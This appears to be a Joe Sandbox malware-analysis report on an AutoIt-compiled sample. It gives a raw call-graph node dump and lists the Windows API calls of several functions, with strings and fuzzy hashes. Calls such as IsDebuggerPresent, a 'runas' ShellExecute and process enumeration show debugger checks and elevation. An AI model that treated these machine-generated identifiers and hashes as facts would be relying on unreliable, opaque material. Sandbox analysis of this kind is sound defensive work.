103384 d20d1f 103384->103367 103385->103377 103386->103380 103387->103378 103388->103372 103389->103374 103391 d2040d ___DestructExceptionObject 103390->103391 103392 d2041b 103391->103392 103395 d20454 103391->103395 103448 d0f649 20 API calls __dosmaperr 103392->103448 103394 d20420 103449 d12b5c 26 API calls pre_c_initialization 103394->103449 103401 d209db 103395->103401 103400 d2042a __wsopen_s 103400->103384 103451 d207af 103401->103451 103404 d20a26 103469 d15594 103404->103469 103405 d20a0d 103483 d0f636 20 API calls __dosmaperr 103405->103483 103408 d20a12 103484 d0f649 20 API calls __dosmaperr 103408->103484 103409 d20a2b 103410 d20a34 103409->103410 103411 d20a4b 103409->103411 103485 d0f636 20 API calls __dosmaperr 103410->103485 103482 d2071a CreateFileW 103411->103482 103415 d20478 103450 d204a1 LeaveCriticalSection __wsopen_s 103415->103450 103416 d20a39 103486 d0f649 20 API calls __dosmaperr 103416->103486 103417 d20b01 GetFileType 103420 d20b53 103417->103420 103421 d20b0c GetLastError 103417->103421 103419 d20ad6 GetLastError 103488 d0f613 20 API calls __dosmaperr 103419->103488 103491 d154dd 21 API calls 2 library calls 103420->103491 103489 d0f613 20 API calls __dosmaperr 103421->103489 103422 d20a84 103422->103417 103422->103419 103487 d2071a CreateFileW 103422->103487 103426 d20b1a CloseHandle 103426->103408 103429 d20b43 103426->103429 103428 d20ac9 103428->103417 103428->103419 103490 d0f649 20 API calls __dosmaperr 103429->103490 103431 d20b74 103433 d20bc0 103431->103433 103492 d2092b 72 API calls 3 library calls 103431->103492 103432 d20b48 103432->103408 103437 d20bed 103433->103437 103493 d204cd 72 API calls 4 library calls 103433->103493 103436 d20be6 103436->103437 103438 d20bfe 103436->103438 103494 d18a2e 103437->103494 103438->103415 103440 d20c7c CloseHandle 103438->103440 103509 d2071a CreateFileW 103440->103509 103442 d20ca7 103443 d20cdd 103442->103443 103444 d20cb1 GetLastError 103442->103444 103443->103415 103510 d0f613 20 
API calls __dosmaperr 103444->103510 103446 d20cbd 103511 d156a6 21 API calls 2 library calls 103446->103511 103448->103394 103449->103400 103450->103400 103452 d207d0 103451->103452 103453 d207ea 103451->103453 103452->103453 103519 d0f649 20 API calls __dosmaperr 103452->103519 103512 d2073f 103453->103512 103455 d20822 103459 d20851 103455->103459 103521 d0f649 20 API calls __dosmaperr 103455->103521 103457 d207df 103520 d12b5c 26 API calls pre_c_initialization 103457->103520 103466 d208a4 103459->103466 103523 d0da7d 26 API calls 2 library calls 103459->103523 103462 d2089f 103464 d2091e 103462->103464 103462->103466 103463 d20846 103522 d12b5c 26 API calls pre_c_initialization 103463->103522 103524 d12b6c 11 API calls _abort 103464->103524 103466->103404 103466->103405 103468 d2092a 103470 d155a0 ___DestructExceptionObject 103469->103470 103527 d132d1 EnterCriticalSection 103470->103527 103472 d155a7 103474 d155cc 103472->103474 103478 d1563a EnterCriticalSection 103472->103478 103480 d155ee 103472->103480 103531 d15373 103474->103531 103475 d15617 __wsopen_s 103475->103409 103479 d15647 LeaveCriticalSection 103478->103479 103478->103480 103479->103472 103528 d1569d 103480->103528 103482->103422 103483->103408 103484->103415 103485->103416 103486->103408 103487->103428 103488->103408 103489->103426 103490->103432 103491->103431 103492->103433 103493->103436 103495 d15737 __wsopen_s 26 API calls 103494->103495 103498 d18a3e 103495->103498 103496 d18a44 103550 d156a6 21 API calls 2 library calls 103496->103550 103498->103496 103499 d18a76 103498->103499 103501 d15737 __wsopen_s 26 API calls 103498->103501 103499->103496 103502 d15737 __wsopen_s 26 API calls 103499->103502 103500 d18a9c 103503 d18abe 103500->103503 103551 d0f613 20 API calls __dosmaperr 103500->103551 103504 d18a6d 103501->103504 103505 d18a82 CloseHandle 103502->103505 103503->103415 103507 d15737 __wsopen_s 26 API calls 103504->103507 103505->103496 103508 d18a8e GetLastError 103505->103508 
103507->103499 103508->103496 103509->103442 103510->103446 103511->103443 103514 d20757 103512->103514 103513 d20772 103513->103455 103514->103513 103525 d0f649 20 API calls __dosmaperr 103514->103525 103516 d20796 103526 d12b5c 26 API calls pre_c_initialization 103516->103526 103518 d207a1 103518->103455 103519->103457 103520->103453 103521->103463 103522->103459 103523->103462 103524->103468 103525->103516 103526->103518 103527->103472 103539 d13319 LeaveCriticalSection 103528->103539 103530 d156a4 103530->103475 103540 d14ff0 103531->103540 103533 d15385 103537 d15392 103533->103537 103547 d13778 11 API calls 2 library calls 103533->103547 103534 d12d38 _free 20 API calls 103536 d153e4 103534->103536 103536->103480 103538 d154ba EnterCriticalSection 103536->103538 103537->103534 103538->103480 103539->103530 103546 d14ffd pre_c_initialization 103540->103546 103541 d1503d 103549 d0f649 20 API calls __dosmaperr 103541->103549 103542 d15028 RtlAllocateHeap 103544 d1503b 103542->103544 103542->103546 103544->103533 103546->103541 103546->103542 103548 d0521d 7 API calls 2 library calls 103546->103548 103547->103533 103548->103546 103549->103544 103550->103500 103551->103503 103552 cf235c 103561 cf2365 __fread_nolock 103552->103561 103553 ce8ec0 52 API calls 103553->103561 103554 d374e3 103564 d413c8 8 API calls __fread_nolock 103554->103564 103556 d374ef 103560 cebed9 8 API calls 103556->103560 103562 cf1ff7 __fread_nolock 103556->103562 103557 cf23b6 103559 ce7d74 8 API calls 103557->103559 103558 d0014b 8 API calls 103558->103561 103559->103562 103560->103562 103561->103553 103561->103554 103561->103557 103561->103558 103561->103562 103563 d0017b 8 API calls 103561->103563 103563->103561 103564->103556 103565 cedd3d 103566 d319c2 103565->103566 103567 cedd63 103565->103567 103571 d31a82 103566->103571 103572 d31a26 103566->103572 103579 d31a46 103566->103579 103568 cedead 103567->103568 103569 d0014b 8 API calls 103567->103569 103573 d0017b 8 API calls 
103568->103573 103576 cedd8d 103569->103576 103625 d53fe1 81 API calls __wsopen_s 103571->103625 103623 cfe6e8 207 API calls 103572->103623 103584 cedee4 __fread_nolock 103573->103584 103574 d31a7d 103578 d0014b 8 API calls 103576->103578 103576->103584 103580 cedddb 103578->103580 103579->103574 103624 d53fe1 81 API calls __wsopen_s 103579->103624 103580->103572 103582 cede16 103580->103582 103581 d0017b 8 API calls 103581->103584 103583 cf0340 207 API calls 103582->103583 103585 cede29 103583->103585 103584->103579 103584->103581 103585->103574 103585->103584 103586 d31aa5 103585->103586 103587 cede77 103585->103587 103589 ced526 103585->103589 103626 d53fe1 81 API calls __wsopen_s 103586->103626 103587->103568 103587->103589 103590 d0014b 8 API calls 103589->103590 103591 ced589 103590->103591 103607 cec32d 103591->103607 103594 d0014b 8 API calls 103595 ced66e ISource 103594->103595 103597 ceb4c8 8 API calls 103595->103597 103599 d31f79 103595->103599 103601 d31f94 103595->103601 103602 cebed9 8 API calls 103595->103602 103605 ced911 ISource 103595->103605 103614 cec3ab 103595->103614 103596 cec3ab 8 API calls 103604 ced9ac ISource 103596->103604 103597->103595 103627 d456ae 8 API calls ISource 103599->103627 103602->103595 103606 ced9c3 103604->103606 103622 cfe30a 8 API calls ISource 103604->103622 103605->103596 103605->103604 103613 cec33d 103607->103613 103608 cec345 103608->103594 103609 d0014b 8 API calls 103609->103613 103610 cebf73 8 API calls 103610->103613 103611 cebed9 8 API calls 103611->103613 103612 cec32d 8 API calls 103612->103613 103613->103608 103613->103609 103613->103610 103613->103611 103613->103612 103615 cec3b9 103614->103615 103621 cec3e1 ISource 103614->103621 103616 cec3c7 103615->103616 103617 cec3ab 8 API calls 103615->103617 103618 cec3cd 103616->103618 103619 cec3ab 8 API calls 103616->103619 103617->103616 103618->103621 103628 cec7e0 8 API calls ISource 103618->103628 103619->103618 103621->103595 103622->103604 103623->103579 
103624->103574 103625->103574 103626->103574 103627->103601 103628->103621 103629 ce105b 103634 ce52a7 103629->103634 103631 ce106a 103665 d00413 29 API calls __onexit 103631->103665 103633 ce1074 103635 ce52b7 __wsopen_s 103634->103635 103636 cebf73 8 API calls 103635->103636 103637 ce536d 103636->103637 103666 ce5594 103637->103666 103639 ce5376 103673 ce5238 103639->103673 103642 ce6b7c 8 API calls 103643 ce538f 103642->103643 103679 ce6a7c 103643->103679 103646 cebf73 8 API calls 103647 ce53a7 103646->103647 103648 cebd57 8 API calls 103647->103648 103649 ce53b0 RegOpenKeyExW 103648->103649 103650 d24be6 RegQueryValueExW 103649->103650 103654 ce53d2 103649->103654 103651 d24c03 103650->103651 103652 d24c7c RegCloseKey 103650->103652 103653 d0017b 8 API calls 103651->103653 103652->103654 103657 d24c8e _wcslen 103652->103657 103655 d24c1c 103653->103655 103654->103631 103656 ce423c 8 API calls 103655->103656 103658 d24c27 RegQueryValueExW 103656->103658 103657->103654 103659 ce655e 8 API calls 103657->103659 103663 ceb329 8 API calls 103657->103663 103664 ce6a7c 8 API calls 103657->103664 103660 d24c5e ISource 103658->103660 103661 d24c44 103658->103661 103659->103657 103660->103652 103662 ce8577 8 API calls 103661->103662 103662->103660 103663->103657 103664->103657 103665->103633 103667 d222d0 __wsopen_s 103666->103667 103668 ce55a1 GetModuleFileNameW 103667->103668 103669 ceb329 8 API calls 103668->103669 103670 ce55c7 103669->103670 103671 ce5851 9 API calls 103670->103671 103672 ce55d1 103671->103672 103672->103639 103674 d222d0 __wsopen_s 103673->103674 103675 ce5245 GetFullPathNameW 103674->103675 103676 ce5267 103675->103676 103677 ce8577 8 API calls 103676->103677 103678 ce5285 103677->103678 103678->103642 103680 ce6a8b 103679->103680 103684 ce6aac __fread_nolock 103679->103684 103682 d0017b 8 API calls 103680->103682 103681 d0014b 8 API calls 103683 ce539e 103681->103683 103682->103684 103683->103646 103684->103681 103685 d31ac5 103686 d31acd 

Control-flow Graph

[Control-flow graph for the code block beginning at ce5fc8; node legend: Executed, Not Executed]
APIs
• GetVersionExW.KERNEL32(?), ref: 00CE5FF7
  • Part of subcall function 00CE8577: _wcslen.LIBCMT ref: 00CE858A
• GetCurrentProcess.KERNEL32(?,00D7DC2C,00000000,?,?), ref: 00CE6123
• IsWow64Process.KERNEL32(00000000,?,?), ref: 00CE612A
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00CE6155
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00CE6167
• GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00CE6175
• FreeLibrary.KERNEL32(00000000,?,?), ref: 00CE617C
• GetSystemInfo.KERNEL32(?,?,?), ref: 00CE61A1
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225
• Opcode ID: 9d4cd7e566c8a3d76e9dc4d9853f7f907e180c54dbc579d41b90296407c21481
• Instruction ID: 9c806c828ba0ff7bfd00a5b55535d4daf195bba7bcca41bbccf5a8fd95e48c53
• Opcode Fuzzy Hash: 9d4cd7e566c8a3d76e9dc4d9853f7f907e180c54dbc579d41b90296407c21481
• Instruction Fuzzy Hash: 1EA1B22381A3E4CFC712CB6A7C455B93FE56B36344B084A9DD481D7366DA3E4948CB36

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00CE3368,?), ref: 00CE33BB
                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00CE3368,?), ref: 00CE33CE
                                                                                                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,00DB2418,00DB2400,?,?,?,?,?,?,00CE3368,?), ref: 00CE343A
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE8577: _wcslen.LIBCMT ref: 00CE858A
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00CE3462,00DB2418,?,?,?,?,?,?,?,00CE3368,?), ref: 00CE42A0
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00000001,00DB2418,?,?,?,?,?,?,?,00CE3368,?), ref: 00CE34BB
                                                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00D23CB0
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00DB2418,?,?,?,?,?,?,?,00CE3368,?), ref: 00D23CF1
                                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00DA31F4,00DB2418,?,?,?,?,?,?,?,00CE3368), ref: 00D23D7A
                                                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,?,?), ref: 00D23D81
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE34D3: GetSysColorBrush.USER32(0000000F), ref: 00CE34DE
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE34D3: LoadCursorW.USER32(00000000,00007F00), ref: 00CE34ED
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE34D3: LoadIconW.USER32(00000063), ref: 00CE3503
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE34D3: LoadIconW.USER32(000000A4), ref: 00CE3515
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE34D3: LoadIconW.USER32(000000A2), ref: 00CE3527
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00CE353F
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE34D3: RegisterClassExW.USER32(?), ref: 00CE3590
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00CE35E1
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00CE3602
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00CE3368,?), ref: 00CE3616
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00CE3368,?), ref: 00CE361F
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00CE3A3C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • runas, xrefs: 00D23D75
                                                                                                                                                                                                                                                                  • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00D23CAA
                                                                                                                                                                                                                                                                  • AutoIt, xrefs: 00D23CA5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                  • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                                                  • API String ID: 683915450-2030392706
                                                                                                                                                                                                                                                                  • Opcode ID: bc6d14ee57c0020e770bfdf83ab3b089ebf03d0d50f6573cd30ed4e24fb09bec
                                                                                                                                                                                                                                                                  • Instruction ID: 04ee4b0736e4d41cf8d9da6e8b57056775d5887f8c87acb1634d54b5605e6a03
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc6d14ee57c0020e770bfdf83ab3b089ebf03d0d50f6573cd30ed4e24fb09bec
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D051C5321083C0EED701EF66DC05D7B7FB99FA5744F04052CF596932A2DB259A49AB32

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00CE55D1,?,?,00D24B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00CE5871
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4EAB0: GetFileAttributesW.KERNEL32(?,00D4D840), ref: 00D4EAB1
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00D4DCCB
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00D4DD1B
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00D4DD2C
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D4DD43
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D4DD4C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                                                                                                                  • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                  • Opcode ID: 95172514cbf01b0cb8c57b6c60b497ad56af074564624be038f39019403137dd
                                                                                                                                                                                                                                                                  • Instruction ID: 06472cfad8276997a5eab9d9b868b723c820eba9116b5991c9234598ddd39838
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95172514cbf01b0cb8c57b6c60b497ad56af074564624be038f39019403137dd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15317A31008385AFC301EB60CC819AFB7E9BE95304F444E1DF4D592292EB21DE0ADB66

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00D4DDAC
                                                                                                                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00D4DDBA
                                                                                                                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00D4DDDA
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D4DE87
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 420147892-0
                                                                                                                                                                                                                                                                  • Opcode ID: a4a043eb29b855522596760297ab2b2f695261afc64f1230128f0e461a066a7c
                                                                                                                                                                                                                                                                  • Instruction ID: ad80d14d698b0b6f4c4db5c33e3f3d0d33d98bbac99d77d890ad9a5154c59693
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4a043eb29b855522596760297ab2b2f695261afc64f1230128f0e461a066a7c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4731A2710083409FD301EF50CC85ABFBBF9AF99350F44092DF585871A1EB719949DBA2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetInputState.USER32 ref: 00CEEF07
                                                                                                                                                                                                                                                                  • timeGetTime.WINMM ref: 00CEF107
                                                                                                                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CEF228
                                                                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 00CEF27B
                                                                                                                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00CEF289
                                                                                                                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CEF29F
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00CEF2B1
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2189390790-0
                                                                                                                                                                                                                                                                  • Opcode ID: 843a9524b33f3f792f10fc4345003edd08a434550d3e738554cd3419f5a43d88
                                                                                                                                                                                                                                                                  • Instruction ID: 557f3935d001adaf84a4f5134d745af02f2a25099712cd6b64ec505d93f4b2d6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 843a9524b33f3f792f10fc4345003edd08a434550d3e738554cd3419f5a43d88
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01321330604781EFD728CF25C844B6AB7E5FF81304F18462DE569873A1D775EA85CBA2

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00CE3657
                                                                                                                                                                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 00CE3681
                                                                                                                                                                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00CE3692
                                                                                                                                                                                                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00CE36AF
                                                                                                                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00CE36BF
                                                                                                                                                                                                                                                                  • LoadIconW.USER32(000000A9), ref: 00CE36D5
                                                                                                                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00CE36E4
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                  • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                                  • Opcode ID: 4edf15cdb82ff1ba4db1b672cda321f3a99c424fccd4a4fa993f095b729e6e83
                                                                                                                                                                                                                                                                  • Instruction ID: 8298d46547ae442dfd2cd4f2be04d09c37d12bbc99840c13e3ad79463e2e8075
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4edf15cdb82ff1ba4db1b672cda321f3a99c424fccd4a4fa993f095b729e6e83
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C021E4B2941318EFDF009F94EC89BADBBB5FB08710F10521AE519E63A0E7B545848FA0

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D2071A: CreateFileW.KERNEL32(00000000,00000000,?,00D20A84,?,?,00000000,?,00D20A84,00000000,0000000C), ref: 00D20737
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D20AEF
                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00D20AF6
                                                                                                                                                                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 00D20B02
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D20B0C
                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00D20B15
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D20B35
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00D20C7F
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D20CB1
                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00D20CB8
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                  • Opcode ID: c8b892d6d161f7823cf26825a18913e15876b8c55fdd4e039548e22059400f24
                                                                                                                                                                                                                                                                  • Instruction ID: 50ccc813c2ef43e29fd7257821d2d08ee66040c66763a8db94f055e920156c7c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8b892d6d161f7823cf26825a18913e15876b8c55fdd4e039548e22059400f24
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34A106329002149FDF29AF68E851BAD7FA1EF1A328F280159F815DB3D2D7319952CB71

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00D24B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00CE55B2
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00CE525A
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00CE53C4
                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00D24BFD
                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00D24C3E
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00D24C80
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D24CE7
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D24CF6
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00CE34DE
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00CE34ED
